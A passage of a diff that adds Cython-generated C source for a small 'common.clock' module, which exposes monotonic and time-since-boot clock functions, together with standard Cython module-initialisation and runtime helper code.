__pyx_empty_tuple, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_clock_pyx, __pyx_n_s_monotonic_time, 19, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj_)) __PYX_ERR(0, 19, __pyx_L1_error) + + /* "common/clock.pyx":22 + * return readclock(CLOCK_MONOTONIC_RAW) + * + * def sec_since_boot(): # <<<<<<<<<<<<<< + * return readclock(CLOCK_BOOTTIME) + * + */ + __pyx_codeobj__2 = (PyObject*)__Pyx_PyCode_New(0, 0, 0, 0, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_common_clock_pyx, __pyx_n_s_sec_since_boot, 22, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__2)) __PYX_ERR(0, 22, __pyx_L1_error) + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_RefNannyFinishContext(); + return -1; +} +/* #### Code section: init_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitConstants(void) { + if (__Pyx_CreateStringTabAndInitStrings() < 0) __PYX_ERR(0, 1, __pyx_L1_error); + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: init_globals ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitGlobals(void) { + return 0; +} +/* #### Code section: init_module ### */ + +static CYTHON_SMALL_CODE int __Pyx_modinit_global_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_import_code(void); /*proto*/ + +static int __Pyx_modinit_global_init_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_global_init_code", 0); + /*--- Global init code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_export_code", 0); + /*--- Variable export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_export_code", 0); + /*--- Function export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_type_init_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_type_init_code", 0); + /*--- Type init code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_type_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_type_import_code", 0); + /*--- Type import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_import_code", 0); + /*--- Variable import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_import_code", 0); + /*--- Function import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + + +#if PY_MAJOR_VERSION >= 3 +#if CYTHON_PEP489_MULTI_PHASE_INIT +static PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def); /*proto*/ +static int __pyx_pymod_exec_clock(PyObject* module); /*proto*/ +static PyModuleDef_Slot __pyx_moduledef_slots[] = { + {Py_mod_create, (void*)__pyx_pymod_create}, + {Py_mod_exec, (void*)__pyx_pymod_exec_clock}, + {0, NULL} +}; +#endif + +#ifdef __cplusplus +namespace { + struct PyModuleDef __pyx_moduledef = + #else + static struct PyModuleDef __pyx_moduledef = + #endif + { + PyModuleDef_HEAD_INIT, + "clock", + 0, /* m_doc */ + #if CYTHON_PEP489_MULTI_PHASE_INIT + 0, /* m_size */ + #elif CYTHON_USE_MODULE_STATE + sizeof(__pyx_mstate), /* m_size */ + #else + -1, /* m_size */ + #endif + __pyx_methods /* m_methods */, + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_moduledef_slots, /* m_slots */ + #else + NULL, /* m_reload */ + #endif + #if CYTHON_USE_MODULE_STATE + __pyx_m_traverse, /* m_traverse */ + __pyx_m_clear, /* m_clear */ + NULL /* m_free */ + #else + NULL, /* m_traverse */ + NULL, /* m_clear */ + NULL /* m_free */ + #endif + }; + #ifdef __cplusplus +} /* anonymous namespace */ +#endif +#endif + +#ifndef CYTHON_NO_PYINIT_EXPORT +#define __Pyx_PyMODINIT_FUNC PyMODINIT_FUNC +#elif PY_MAJOR_VERSION < 3 +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" void +#else +#define __Pyx_PyMODINIT_FUNC void +#endif +#else +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" PyObject * +#else +#define __Pyx_PyMODINIT_FUNC PyObject * +#endif +#endif + + +#if PY_MAJOR_VERSION < 3 +__Pyx_PyMODINIT_FUNC initclock(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC initclock(void) +#else +__Pyx_PyMODINIT_FUNC PyInit_clock(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC PyInit_clock(void) +#if CYTHON_PEP489_MULTI_PHASE_INIT +{ + return PyModuleDef_Init(&__pyx_moduledef); +} +static CYTHON_SMALL_CODE int __Pyx_check_single_interpreter(void) { + #if PY_VERSION_HEX >= 0x030700A1 + static PY_INT64_T main_interpreter_id = -1; + PY_INT64_T current_id = PyInterpreterState_GetID(PyThreadState_Get()->interp); + if (main_interpreter_id == -1) { + main_interpreter_id = current_id; + return (unlikely(current_id == -1)) ? -1 : 0; + } else if (unlikely(main_interpreter_id != current_id)) + #else + static PyInterpreterState *main_interpreter = NULL; + PyInterpreterState *current_interpreter = PyThreadState_Get()->interp; + if (!main_interpreter) { + main_interpreter = current_interpreter; + } else if (unlikely(main_interpreter != current_interpreter)) + #endif + { + PyErr_SetString( + PyExc_ImportError, + "Interpreter change detected - this module can only be loaded into one interpreter per process."); + return -1; + } + return 0; +} +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *module, const char* from_name, const char* to_name, int allow_none) +#else +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *moddict, const char* from_name, const char* to_name, int allow_none) +#endif +{ + PyObject *value = PyObject_GetAttrString(spec, from_name); + int result = 0; + if (likely(value)) { + if (allow_none || value != Py_None) { +#if CYTHON_COMPILING_IN_LIMITED_API + result = PyModule_AddObject(module, to_name, value); +#else + result = PyDict_SetItemString(moddict, to_name, value); +#endif + } + Py_DECREF(value); + } else if (PyErr_ExceptionMatches(PyExc_AttributeError)) { + PyErr_Clear(); + } else { + result = -1; + } + return result; +} +static CYTHON_SMALL_CODE PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def) { + PyObject *module = NULL, *moddict, *modname; + CYTHON_UNUSED_VAR(def); + if (__Pyx_check_single_interpreter()) + return NULL; + if (__pyx_m) + return __Pyx_NewRef(__pyx_m); + modname = PyObject_GetAttrString(spec, "name"); + if (unlikely(!modname)) goto bad; + module = PyModule_NewObject(modname); + Py_DECREF(modname); + if (unlikely(!module)) goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + moddict = module; +#else + moddict = PyModule_GetDict(module); + if (unlikely(!moddict)) goto bad; +#endif + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "loader", "__loader__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "origin", "__file__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "parent", "__package__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "submodule_search_locations", "__path__", 0) < 0)) goto bad; + return module; +bad: + Py_XDECREF(module); + return NULL; +} + + +static CYTHON_SMALL_CODE int __pyx_pymod_exec_clock(PyObject *__pyx_pyinit_module) +#endif +#endif +{ + int stringtab_initialized = 0; + #if CYTHON_USE_MODULE_STATE + int pystate_addmodule_run = 0; + #endif + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannyDeclarations + #if CYTHON_PEP489_MULTI_PHASE_INIT + if (__pyx_m) { + if (__pyx_m == __pyx_pyinit_module) return 0; + PyErr_SetString(PyExc_RuntimeError, "Module 'clock' has already been imported. Re-initialisation is not supported."); + return -1; + } + #elif PY_MAJOR_VERSION >= 3 + if (__pyx_m) return __Pyx_NewRef(__pyx_m); + #endif + /*--- Module creation code ---*/ + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_m = __pyx_pyinit_module; + Py_INCREF(__pyx_m); + #else + #if PY_MAJOR_VERSION < 3 + __pyx_m = Py_InitModule4("clock", __pyx_methods, 0, 0, PYTHON_API_VERSION); Py_XINCREF(__pyx_m); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #elif CYTHON_USE_MODULE_STATE + __pyx_t_1 = PyModule_Create(&__pyx_moduledef); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1, __pyx_L1_error) + { + int add_module_result = PyState_AddModule(__pyx_t_1, &__pyx_moduledef); + __pyx_t_1 = 0; /* transfer ownership from __pyx_t_1 to clock pseudovariable */ + if (unlikely((add_module_result < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + pystate_addmodule_run = 1; + } + #else + __pyx_m = PyModule_Create(&__pyx_moduledef); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #endif + CYTHON_UNUSED_VAR(__pyx_t_1); + __pyx_d = PyModule_GetDict(__pyx_m); if (unlikely(!__pyx_d)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_d); + __pyx_b = PyImport_AddModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_b)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_b); + __pyx_cython_runtime = PyImport_AddModule((char *) "cython_runtime"); if (unlikely(!__pyx_cython_runtime)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_cython_runtime); + if (PyObject_SetAttrString(__pyx_m, "__builtins__", __pyx_b) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if CYTHON_REFNANNY +__Pyx_RefNanny = __Pyx_RefNannyImportAPI("refnanny"); +if (!__Pyx_RefNanny) { + PyErr_Clear(); + __Pyx_RefNanny = __Pyx_RefNannyImportAPI("Cython.Runtime.refnanny"); + if (!__Pyx_RefNanny) + Py_FatalError("failed to import 'refnanny' module"); +} +#endif + __Pyx_RefNannySetupContext("__Pyx_PyMODINIT_FUNC PyInit_clock(void)", 0); + if (__Pyx_check_binary_version() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pxy_PyFrame_Initialize_Offsets + __Pxy_PyFrame_Initialize_Offsets(); + #endif + __pyx_empty_tuple = PyTuple_New(0); if (unlikely(!__pyx_empty_tuple)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_bytes = PyBytes_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_bytes)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_unicode = PyUnicode_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_unicode)) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pyx_CyFunction_USED + if (__pyx_CyFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_FusedFunction_USED + if (__pyx_FusedFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Coroutine_USED + if (__pyx_Coroutine_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Generator_USED + if (__pyx_Generator_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_AsyncGen_USED + if (__pyx_AsyncGen_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_StopAsyncIteration_USED + if (__pyx_StopAsyncIteration_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + /*--- Library function declarations ---*/ + /*--- Threads initialization code ---*/ + #if defined(WITH_THREAD) && PY_VERSION_HEX < 0x030700F0 && defined(__PYX_FORCE_INIT_THREADS) && __PYX_FORCE_INIT_THREADS + PyEval_InitThreads(); + #endif + /*--- Initialize various global constants etc. ---*/ + if (__Pyx_InitConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + stringtab_initialized = 1; + if (__Pyx_InitGlobals() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if PY_MAJOR_VERSION < 3 && (__PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT) + if (__Pyx_init_sys_getdefaultencoding_params() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + if (__pyx_module_is_main_common__clock) { + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_name, __pyx_n_s_main) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + } + #if PY_MAJOR_VERSION >= 3 + { + PyObject *modules = PyImport_GetModuleDict(); if (unlikely(!modules)) __PYX_ERR(0, 1, __pyx_L1_error) + if (!PyDict_GetItemString(modules, "common.clock")) { + if (unlikely((PyDict_SetItemString(modules, "common.clock", __pyx_m) < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + } + } + #endif + /*--- Builtin init code ---*/ + if (__Pyx_InitCachedBuiltins() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Constants init code ---*/ + if (__Pyx_InitCachedConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Global type/function init code ---*/ + (void)__Pyx_modinit_global_init_code(); + (void)__Pyx_modinit_variable_export_code(); + (void)__Pyx_modinit_function_export_code(); + (void)__Pyx_modinit_type_init_code(); + (void)__Pyx_modinit_type_import_code(); + (void)__Pyx_modinit_variable_import_code(); + (void)__Pyx_modinit_function_import_code(); + /*--- Execution code ---*/ + #if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) + if (__Pyx_patch_abc() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + + /* "common/clock.pyx":19 + * return current + * + * def monotonic_time(): # <<<<<<<<<<<<<< + * return readclock(CLOCK_MONOTONIC_RAW) + * + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_5clock_1monotonic_time, 0, __pyx_n_s_monotonic_time, NULL, __pyx_n_s_common_clock, __pyx_d, ((PyObject *)__pyx_codeobj_)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 19, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_monotonic_time, __pyx_t_2) < 0) __PYX_ERR(0, 19, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "common/clock.pyx":22 + * return readclock(CLOCK_MONOTONIC_RAW) + * + * def sec_since_boot(): # <<<<<<<<<<<<<< + * return readclock(CLOCK_BOOTTIME) + * + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_5clock_3sec_since_boot, 0, __pyx_n_s_sec_since_boot, NULL, __pyx_n_s_common_clock, __pyx_d, ((PyObject *)__pyx_codeobj__2)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 22, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_sec_since_boot, __pyx_t_2) < 0) __PYX_ERR(0, 22, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "common/clock.pyx":1 + * # distutils: language = c++ # <<<<<<<<<<<<<< + * # cython: language_level = 3 + * from posix.time cimport clock_gettime, timespec, CLOCK_MONOTONIC_RAW, clockid_t + */ + __pyx_t_2 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_test, __pyx_t_2) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /*--- Wrapped vars code ---*/ + + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + if (__pyx_m) { + if (__pyx_d && stringtab_initialized) { + __Pyx_AddTraceback("init common.clock", __pyx_clineno, __pyx_lineno, __pyx_filename); + } + #if !CYTHON_USE_MODULE_STATE + Py_CLEAR(__pyx_m); + #else + Py_DECREF(__pyx_m); + if (pystate_addmodule_run) { + PyObject *tp, *value, *tb; + PyErr_Fetch(&tp, &value, &tb); + PyState_RemoveModule(&__pyx_moduledef); + PyErr_Restore(tp, value, tb); + } + #endif + } else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_ImportError, "init common.clock"); + } + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + #if CYTHON_PEP489_MULTI_PHASE_INIT + return (__pyx_m != NULL) ? 0 : -1; + #elif PY_MAJOR_VERSION >= 3 + return __pyx_m; + #else + return; + #endif +} +/* #### Code section: cleanup_globals ### */ +/* #### Code section: cleanup_module ### */ +/* #### Code section: main_method ### */ +/* #### Code section: utility_code_pragmas ### */ +#ifdef _MSC_VER +#pragma warning( push ) +/* Warning 4127: conditional expression is constant + * Cython uses constant conditional expressions to allow in inline functions to be optimized at + * compile-time, so this warning is not useful + */ +#pragma warning( disable : 4127 ) +#endif + + + +/* #### Code section: utility_code_def ### */ + +/* --- Runtime support code --- */ +/* Refnanny */ +#if CYTHON_REFNANNY +static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname) { + PyObject *m = NULL, *p = NULL; + void *r = NULL; + m = PyImport_ImportModule(modname); + if (!m) goto end; + p = PyObject_GetAttrString(m, "RefNannyAPI"); + if (!p) goto end; + r = PyLong_AsVoidPtr(p); +end: + Py_XDECREF(p); + Py_XDECREF(m); + return (__Pyx_RefNannyAPIStruct *)r; +} +#endif + +/* TupleAndListFromArray */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE void __Pyx_copy_object_array(PyObject *const *CYTHON_RESTRICT src, PyObject** CYTHON_RESTRICT dest, Py_ssize_t length) { + PyObject *v; + Py_ssize_t i; + for (i = 0; i < length; i++) { + v = dest[i] = src[i]; + Py_INCREF(v); + } +} +static CYTHON_INLINE PyObject * +__Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + Py_INCREF(__pyx_empty_tuple); + return __pyx_empty_tuple; + } + res = PyTuple_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyTupleObject*)res)->ob_item, n); + return res; +} +static CYTHON_INLINE PyObject * +__Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + return PyList_New(0); + } + res = PyList_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyListObject*)res)->ob_item, n); + return res; +} +#endif + +/* BytesEquals */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else + if (s1 == s2) { + return (equals == Py_EQ); + } else if (PyBytes_CheckExact(s1) & PyBytes_CheckExact(s2)) { + const char *ps1, *ps2; + Py_ssize_t length = PyBytes_GET_SIZE(s1); + if (length != PyBytes_GET_SIZE(s2)) + return (equals == Py_NE); + ps1 = PyBytes_AS_STRING(s1); + ps2 = PyBytes_AS_STRING(s2); + if (ps1[0] != ps2[0]) { + return (equals == Py_NE); + } else if (length == 1) { + return (equals == Py_EQ); + } else { + int result; +#if CYTHON_USE_UNICODE_INTERNALS && (PY_VERSION_HEX < 0x030B0000) + Py_hash_t hash1, hash2; + hash1 = ((PyBytesObject*)s1)->ob_shash; + hash2 = ((PyBytesObject*)s2)->ob_shash; + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + return (equals == Py_NE); + } +#endif + result = memcmp(ps1, ps2, (size_t)length); + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & PyBytes_CheckExact(s2)) { + return (equals == Py_NE); + } else if ((s2 == Py_None) & PyBytes_CheckExact(s1)) { + return (equals == Py_NE); + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +#endif +} + +/* UnicodeEquals */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else +#if PY_MAJOR_VERSION < 3 + PyObject* owned_ref = NULL; +#endif + int s1_is_unicode, s2_is_unicode; + if (s1 == s2) { + goto return_eq; + } + s1_is_unicode = PyUnicode_CheckExact(s1); + s2_is_unicode = PyUnicode_CheckExact(s2); +#if PY_MAJOR_VERSION < 3 + if ((s1_is_unicode & (!s2_is_unicode)) && PyString_CheckExact(s2)) { + owned_ref = PyUnicode_FromObject(s2); + if (unlikely(!owned_ref)) + return -1; + s2 = owned_ref; + s2_is_unicode = 1; + } else if ((s2_is_unicode & (!s1_is_unicode)) && PyString_CheckExact(s1)) { + owned_ref = PyUnicode_FromObject(s1); + if (unlikely(!owned_ref)) + return -1; + s1 = owned_ref; + s1_is_unicode = 1; + } else if (((!s2_is_unicode) & (!s1_is_unicode))) { + return __Pyx_PyBytes_Equals(s1, s2, equals); + } +#endif + if (s1_is_unicode & s2_is_unicode) { + Py_ssize_t length; + int kind; + void *data1, *data2; + if (unlikely(__Pyx_PyUnicode_READY(s1) < 0) || unlikely(__Pyx_PyUnicode_READY(s2) < 0)) + return -1; + length = __Pyx_PyUnicode_GET_LENGTH(s1); + if (length != __Pyx_PyUnicode_GET_LENGTH(s2)) { + goto return_ne; + } +#if CYTHON_USE_UNICODE_INTERNALS + { + Py_hash_t hash1, hash2; + #if CYTHON_PEP393_ENABLED + hash1 = ((PyASCIIObject*)s1)->hash; + hash2 = ((PyASCIIObject*)s2)->hash; + #else + hash1 = ((PyUnicodeObject*)s1)->hash; + hash2 = ((PyUnicodeObject*)s2)->hash; + #endif + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + goto return_ne; + } + } +#endif + kind = __Pyx_PyUnicode_KIND(s1); + if (kind != __Pyx_PyUnicode_KIND(s2)) { + goto return_ne; + } + data1 = __Pyx_PyUnicode_DATA(s1); + data2 = __Pyx_PyUnicode_DATA(s2); + if (__Pyx_PyUnicode_READ(kind, data1, 0) != __Pyx_PyUnicode_READ(kind, data2, 0)) { + goto return_ne; + } else if (length == 1) { + goto return_eq; + } else { + int result = memcmp(data1, data2, (size_t)(length * kind)); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & s2_is_unicode) { + goto return_ne; + } else if ((s2 == Py_None) & s1_is_unicode) { + goto return_ne; + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +return_eq: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ); +return_ne: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_NE); +#endif +} + +/* fastcall */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s) +{ + Py_ssize_t i, n = PyTuple_GET_SIZE(kwnames); + for (i = 0; i < n; i++) + { + if (s == PyTuple_GET_ITEM(kwnames, i)) return kwvalues[i]; + } + for (i = 0; i < n; i++) + { + int eq = __Pyx_PyUnicode_Equals(s, PyTuple_GET_ITEM(kwnames, i), Py_EQ); + if (unlikely(eq != 0)) { + if (unlikely(eq < 0)) return NULL; // error + return kwvalues[i]; + } + } + return NULL; // not found (no exception set) +} +#endif + +/* FixUpExtensionType */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type) { +#if PY_VERSION_HEX > 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API + CYTHON_UNUSED_VAR(spec); + CYTHON_UNUSED_VAR(type); +#else + const PyType_Slot *slot = spec->slots; + while (slot && slot->slot && slot->slot != Py_tp_members) + slot++; + if (slot && slot->slot == Py_tp_members) { + int changed = 0; +#if !(PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON) + const +#endif + PyMemberDef *memb = (PyMemberDef*) slot->pfunc; + while (memb && memb->name) { + if (memb->name[0] == '_' && memb->name[1] == '_') { +#if PY_VERSION_HEX < 0x030900b1 + if (strcmp(memb->name, "__weaklistoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_weaklistoffset = memb->offset; + changed = 1; + } + else if (strcmp(memb->name, "__dictoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_dictoffset = memb->offset; + changed = 1; + } +#if CYTHON_METH_FASTCALL + else if (strcmp(memb->name, "__vectorcalloffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); +#if PY_VERSION_HEX >= 0x030800b4 + type->tp_vectorcall_offset = memb->offset; +#else + type->tp_print = (printfunc) memb->offset; +#endif + changed = 1; + } +#endif +#else + if ((0)); +#endif +#if PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON + else if (strcmp(memb->name, "__module__") == 0) { + PyObject *descr; + assert(memb->type == T_OBJECT); + assert(memb->flags == 0 || memb->flags == READONLY); + descr = PyDescr_NewMember(type, memb); + if (unlikely(!descr)) + return -1; + if (unlikely(PyDict_SetItem(type->tp_dict, PyDescr_NAME(descr), descr) < 0)) { + Py_DECREF(descr); + return -1; + } + Py_DECREF(descr); + changed = 1; + } +#endif + } + memb++; + } + if (changed) + PyType_Modified(type); + } +#endif + return 0; +} +#endif + +/* FetchSharedCythonModule */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void) { + PyObject *abi_module = PyImport_AddModule((char*) __PYX_ABI_MODULE_NAME); + if (unlikely(!abi_module)) return NULL; + Py_INCREF(abi_module); + return abi_module; +} + +/* FetchCommonType */ +static int __Pyx_VerifyCachedType(PyObject *cached_type, + const char *name, + Py_ssize_t basicsize, + Py_ssize_t expected_basicsize) { + if (!PyType_Check(cached_type)) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s is not a type object", name); + return -1; + } + if (basicsize != expected_basicsize) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s has the wrong size, try recompiling", + name); + return -1; + } + return 0; +} +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type) { + PyObject* abi_module; + const char* object_name; + PyTypeObject *cached_type = NULL; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + object_name = strrchr(type->tp_name, '.'); + object_name = object_name ? object_name+1 : type->tp_name; + cached_type = (PyTypeObject*) PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + if (__Pyx_VerifyCachedType( + (PyObject *)cached_type, + object_name, + cached_type->tp_basicsize, + type->tp_basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + if (PyType_Ready(type) < 0) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, (PyObject *)type) < 0) + goto bad; + Py_INCREF(type); + cached_type = type; +done: + Py_DECREF(abi_module); + return cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#else +static PyTypeObject *__Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases) { + PyObject *abi_module, *cached_type = NULL; + const char* object_name = strrchr(spec->name, '.'); + object_name = object_name ? object_name+1 : spec->name; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + cached_type = PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + Py_ssize_t basicsize; +#if CYTHON_COMPILING_IN_LIMITED_API + 